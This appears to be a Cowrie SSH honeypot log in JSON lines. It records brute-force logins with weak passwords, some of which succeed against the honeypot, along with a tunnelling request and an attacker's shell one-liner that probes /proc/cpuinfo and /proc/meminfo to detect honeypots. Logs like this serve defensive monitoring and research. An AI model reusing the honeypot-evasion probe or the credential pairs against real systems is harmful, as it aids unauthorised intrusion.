{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:55:01.911284Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:55:02.257022Z","src_ip":"212.227.125.160","session":"593de78b08c3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T17:55:13.631054Z","src_ip":"212.227.125.160","session":"a2546896c6d6"}
{"eventid":"cowrie.session.closed","duration":"33.0","message":"Connection lost after 33.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:55:25.204685Z","src_ip":"212.227.125.160","session":"a2546896c6d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40936,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b809e9d3599","protocol":"ssh","message":"New connection: 212.227.235.229:40936 (1.2.3.4:22) [session: 0b809e9d3599]","sensor":"my-vps","timestamp":"2025-08-28T17:55:28.268352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:55:28.269238Z","src_ip":"212.227.235.229","session":"0b809e9d3599"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T17:55:28.373909Z","src_ip":"212.227.235.229","session":"0b809e9d3599"}
{"eventid":"cowrie.login.failed","username":"solana","password":"12345678","message":"login attempt [solana/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T17:55:28.692119Z","src_ip":"212.227.235.229","session":"0b809e9d3599"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":50868,"dst_ip":"1.2.3.4","dst_port":22,"session":"95f9289d39f4","protocol":"ssh","message":"New connection: 199.195.253.95:50868 (1.2.3.4:22) [session: 95f9289d39f4]","sensor":"my-vps","timestamp":"2025-08-28T17:55:29.396597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:55:29.404339Z","src_ip":"199.195.253.95","session":"95f9289d39f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:55:29.594895Z","src_ip":"199.195.253.95","session":"95f9289d39f4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:55:29.798159Z","src_ip":"212.227.235.229","session":"0b809e9d3599"}
{"eventid":"cowrie.login.failed","username":"rokos","password":"123","message":"login attempt [rokos/123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:55:30.237159Z","src_ip":"199.195.253.95","session":"95f9289d39f4"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:55:31.429527Z","src_ip":"199.195.253.95","session":"95f9289d39f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49390,"dst_ip":"1.2.3.4","dst_port":22,"session":"95f555a2968c","protocol":"ssh","message":"New connection: 212.227.125.160:49390 (1.2.3.4:22) [session: 95f555a2968c]","sensor":"my-vps","timestamp":"2025-08-28T17:55:56.349345Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:55:56.350621Z","src_ip":"212.227.125.160","session":"95f555a2968c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49683,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fea1bf0d616","protocol":"ssh","message":"New connection: 212.227.125.160:49683 (1.2.3.4:22) [session: 3fea1bf0d616]","sensor":"my-vps","timestamp":"2025-08-28T17:55:56.466799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:55:56.467834Z","src_ip":"212.227.125.160","session":"3fea1bf0d616"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T17:55:56.583972Z","src_ip":"212.227.125.160","session":"3fea1bf0d616"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:55:56.934804Z","src_ip":"212.227.125.160","session":"3fea1bf0d616"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T17:55:57.051838Z","session":"3fea1bf0d616"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":47840,"dst_ip":"1.2.3.4","dst_port":22,"session":"70517da0b4e3","protocol":"ssh","message":"New connection: 199.195.253.95:47840 (1.2.3.4:22) [session: 70517da0b4e3]","sensor":"my-vps","timestamp":"2025-08-28T17:56:39.526596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:56:39.534350Z","src_ip":"199.195.253.95","session":"70517da0b4e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:56:39.690860Z","src_ip":"199.195.253.95","session":"70517da0b4e3"}
{"eventid":"cowrie.login.failed","username":"team06","password":"team06","message":"login attempt [team06/team06] failed","sensor":"my-vps","timestamp":"2025-08-28T17:56:40.295315Z","src_ip":"199.195.253.95","session":"70517da0b4e3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:56:41.491253Z","src_ip":"199.195.253.95","session":"70517da0b4e3"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:57:06.467484Z","src_ip":"212.227.125.160","session":"3fea1bf0d616"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59338,"dst_ip":"1.2.3.4","dst_port":22,"session":"a969fd76149a","protocol":"ssh","message":"New connection: 212.227.125.160:59338 (1.2.3.4:22) [session: a969fd76149a]","sensor":"my-vps","timestamp":"2025-08-28T17:57:16.450981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:57:16.510125Z","src_ip":"212.227.125.160","session":"a969fd76149a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:57:18.341197Z","src_ip":"212.227.125.160","session":"a969fd76149a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:57:20.645003Z","src_ip":"212.227.125.160","session":"a969fd76149a"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:57:22.436564Z","src_ip":"212.227.125.160","session":"a969fd76149a"}
{"eventid":"cowrie.session.connect","src_ip":"65.49.1.102","src_port":57453,"dst_ip":"1.2.3.4","dst_port":22,"session":"a95d0d7d0020","protocol":"ssh","message":"New connection: 65.49.1.102:57453 (1.2.3.4:22) [session: a95d0d7d0020]","sensor":"my-vps","timestamp":"2025-08-28T17:57:27.216881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:57:27.217857Z","src_ip":"65.49.1.102","session":"a95d0d7d0020"}
{"eventid":"cowrie.client.kex","hassh":"7216c7c473918b4f83d1139b3c70dbf9","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9","sensor":"my-vps","timestamp":"2025-08-28T17:57:27.365883Z","src_ip":"65.49.1.102","session":"a95d0d7d0020"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:57:31.217951Z","src_ip":"65.49.1.102","session":"a95d0d7d0020"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":9842,"dst_ip":"1.2.3.4","dst_port":22,"session":"45bcfc35fad2","protocol":"ssh","message":"New connection: 212.227.235.229:9842 (1.2.3.4:22) [session: 45bcfc35fad2]","sensor":"my-vps","timestamp":"2025-08-28T17:57:35.320415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:57:35.357168Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-28T17:57:35.570573Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.login.success","username":"root","password":"00000000","message":"login attempt [root/00000000] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:57:36.705206Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:57:37.358380Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.359160Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.359931Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.362149Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.363020Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.364268Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.365293Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.366154Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.367111Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.368045Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.369174Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.461433Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.462338Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:57:37.463440Z","src_ip":"212.227.235.229","session":"45bcfc35fad2"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":44812,"dst_ip":"1.2.3.4","dst_port":22,"session":"a221bfbd475f","protocol":"ssh","message":"New connection: 199.195.253.95:44812 (1.2.3.4:22) [session: a221bfbd475f]","sensor":"my-vps","timestamp":"2025-08-28T17:57:52.439136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:57:52.444119Z","src_ip":"199.195.253.95","session":"a221bfbd475f"}
